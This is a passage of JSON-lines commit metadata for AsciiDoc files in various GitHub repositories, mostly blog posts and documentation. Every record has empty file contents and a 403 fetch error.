2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","repos":"jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io","old_file":"_posts\/2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","new_file":"_posts\/2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jkschneider\/jkschneider.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd54b079d0d85f67dbcbc0d18b8919ecabf489f","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"261c938d80032f9dcc1e172ccfd8bc7c7074ab83","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72478b8f3993069a98fd440be680e7c471519cfc","subject":"added readme","message":"added 
readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jbpm\/business-application-mysql\/readme.adoc","new_file":"jbpm\/business-application-mysql\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d84a19ff58a78c3d9197b95279a6b95d6c812f","subject":"y2b create post Resistance 3 Doomsday Edition Unboxing \\u0026 Overview","message":"y2b create post Resistance 3 Doomsday Edition Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-06-Resistance-3-Doomsday-Edition-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-09-06-Resistance-3-Doomsday-Edition-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84e9f838ac2a1d8130c736f7bd622b4ac73ce5cd","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33c465ef2ad39848273c648234e46f185e26379e","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd0f1eb856c0de22d784cfb2cd9075cdf30fd4ba","subject":"Update 2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","message":"Update 2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","new_file":"_posts\/2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cf94d9e7deb2a250f1d07e1fd5e7976327b0380","subject":"Document how init.groovy.d works a bit","message":"Document how init.groovy.d works a bit\n","repos":"CodeValet\/codevalet,CodeValet\/codevalet,CodeValet\/codevalet","old_file":"init.groovy.d\/README.adoc","new_file":"init.groovy.d\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CodeValet\/codevalet.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"7d71ed336cfda5ee7cb3aaa2ab0fc6998134c5c4","subject":"y2b create post My Ultimate Setup - Episode 2","message":"y2b create post My Ultimate Setup - Episode 2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-07-My-Ultimate-Setup--Episode-2.adoc","new_file":"_posts\/2015-04-07-My-Ultimate-Setup--Episode-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf54a1f3d377974eee9896729720606c77b05c1b","subject":"Update 2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bdafd61598c085b05d0d207ac69a89b3b93aed1","subject":"y2b create post Feenix Autore Keyboard + Nascita Gaming Mouse Unboxing","message":"y2b create post Feenix Autore Keyboard + Nascita Gaming Mouse Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-14-Feenix-Autore-Keyboard--Nascita-Gaming-Mouse-Unboxing.adoc","new_file":"_posts\/2014-04-14-Feenix-Autore-Keyboard--Nascita-Gaming-Mouse-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a15064ac753a5bb0f138f19e95ec62261ccbf187","subject":"Add heroku docs","message":"Add heroku docs\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/deployment-heroku.asciidoc","new_file":"doc\/src\/main\/docs\/deployment-heroku.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04935f07c81131147282da052f237f095925e29e","subject":"Fix formatting in 6.4 upgrade recipe","message":"Fix formatting in 6.4 upgrade 
recipe","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"feef89962dbdb287248061c1427701242aa84be8","subject":"Create readme.adoc","message":"Create readme.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"ldap\/embedded\/readme.adoc","new_file":"ldap\/embedded\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b9225ffe449fbe4ba95c5055e49c5acc9a2bd01","subject":"Update 2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","message":"Update 2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","new_file":"_posts\/2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6de211e8aca71249dcd2d0a74d1d2017d3c66e9e","subject":"Split file system watching into a separate page","message":"Split file system watching into a separate page","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/file_system_watching.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/file_system_watching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gradle\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"74be800b1b7c19adb09b00742d4a6817d900609f","subject":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1edd178ea7df10dccab04a19ac7057870bbf57b8","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 
2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8cf31fa327587288b0c47c44137929950cac6fd","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae98fcf39ad3e50a036a2159857a7af6a352af53","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ce6ef70840862754d99866c885683041bdb0be8","subject":"Update 2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","message":"Update 2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","new_file":"_posts\/2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23c297c871b0d997ae9b3879bd88f6becc0888fd","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a313fcc85ea0272abcda4a60180f34d17b173499","subject":"Worked on documentation","message":"Worked on 
documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/CUPS Internet Printing Protocol (IPP) format.asciidoc","new_file":"documentation\/CUPS Internet Printing Protocol (IPP) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9565c3b3770f8131da80608a72181ce28bca70e3","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d196a9c3d5e10b095f1f8080fb83577d86451414","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6640619a0ff84ea279c2b85149cb1929520794bf","subject":"news\/2016-11-03-forge-3.3.3.final.asciidoc","message":"news\/2016-11-03-forge-3.3.3.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-11-03-forge-3.3.3.final.asciidoc","new_file":"news\/2016-11-03-forge-3.3.3.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8a28c72c0e116331fa5a5af13a73a360bb5ea050","subject":"y2b create post These Earbuds Give You Super Powers (Seriously)","message":"y2b create post These Earbuds Give You Super Powers (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-18-These-Earbuds-Give-You-Super-Powers-Seriously.adoc","new_file":"_posts\/2017-06-18-These-Earbuds-Give-You-Super-Powers-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e67c1aadb903d914f922ca7ad70529ea48fe8520","subject":"Init, einfachst m\u00f6gliche Implementierungsstrategie","message":"Init, einfachst m\u00f6gliche 
Implementierungsstrategie\n","repos":"openlab-aux\/papstehrenwort,openlab-aux\/papstehrenwort,openlab-aux\/papstehrenwort","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openlab-aux\/papstehrenwort.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"fe6bd921cb5e79363ad706dfa2bd3baf4bf2759e","subject":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","message":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b00e7659ad07cc3382bf019c994b7f932f5226ab","subject":"job: #11959 introducing implementation note for epoch time EE addition","message":"job: #11959 introducing implementation note for epoch time EE addition\n","repos":"rmulvey\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11959_newtim_int.adoc","new_file":"doc-bridgepoint\/notes\/11959_newtim_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83261ba3727b20fa9581d60ce14d4f0cc60255cb","subject":"\u4fee\u6539\u6587\u6863\u683c\u5f0f","message":"\u4fee\u6539\u6587\u6863\u683c\u5f0f\n","repos":"piggsoft\/simon","old_file":"src\/main\/asciidoc\/api-guide.adoc","new_file":"src\/main\/asciidoc\/api-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/piggsoft\/simon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6705d5798bcd560a536d09c9b727a08b6a09d5e","subject":"Update 
2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79cf9453cd1036519dbc9d45482e5e75e3e87801","subject":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc'","message":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc'","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc","new_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37c92ae07d7c8233f15d14a6ed26bb77c98399f7","subject":"Update 2015-10-10-Space-Quest.adoc","message":"Update 2015-10-10-Space-Quest.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-10-Space-Quest.adoc","new_file":"_posts\/2015-10-10-Space-Quest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9054b27d0ad67a14441451af2def90cb6fc0b01d","subject":"Update 2015-11-12-Da-Dom-huck.adoc","message":"Update 2015-11-12-Da-Dom-huck.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-12-Da-Dom-huck.adoc","new_file":"_posts\/2015-11-12-Da-Dom-huck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b937c8d3aa5c3295182798c74b41eb2b04ebe626","subject":"Deleted _posts\/2016-11-21-Fresh-Start.adoc","message":"Deleted _posts\/2016-11-21-Fresh-Start.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8b8ebab80528c97578abef7a58c4ef812c40428","subject":"Update 2018-02-19-Amazon-Echo.adoc","message":"Update 
2018-02-19-Amazon-Echo.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27cc2de2c00752620f43d4f3778465600bb2b18c","subject":"y2b create post Using Your Wrist To Power Your Smartphone...","message":"y2b create post Using Your Wrist To Power Your Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-20-Using%20Your%20Wrist%20To%20Power%20Your%20Smartphone....adoc","new_file":"_posts\/2018-01-20-Using%20Your%20Wrist%20To%20Power%20Your%20Smartphone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4dd4010527d97c5bdae3de66ce63f59f432f9c2","subject":"Add a new monitoring stack configuration scenario","message":"Add a new monitoring stack configuration scenario\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/monitoring-moving-monitoring-components-to-different-nodes.adoc","new_file":"modules\/monitoring-moving-monitoring-components-to-different-nodes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2080d8d0681d99b31156831afbf49082b8b55c38","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05fdc8b9222a1b4fb437636eb04c14b8b5443bcd","subject":"Added initial README.","message":"Added initial README.\n","repos":"qaware\/cloudcontrol,qaware\/cloudcontrol","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qaware\/cloudcontrol.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a649211324f4bc1c65653733694520037f62c864","subject":"Add commit message standards","message":"Add commit message standards\n\nCreated a standard for 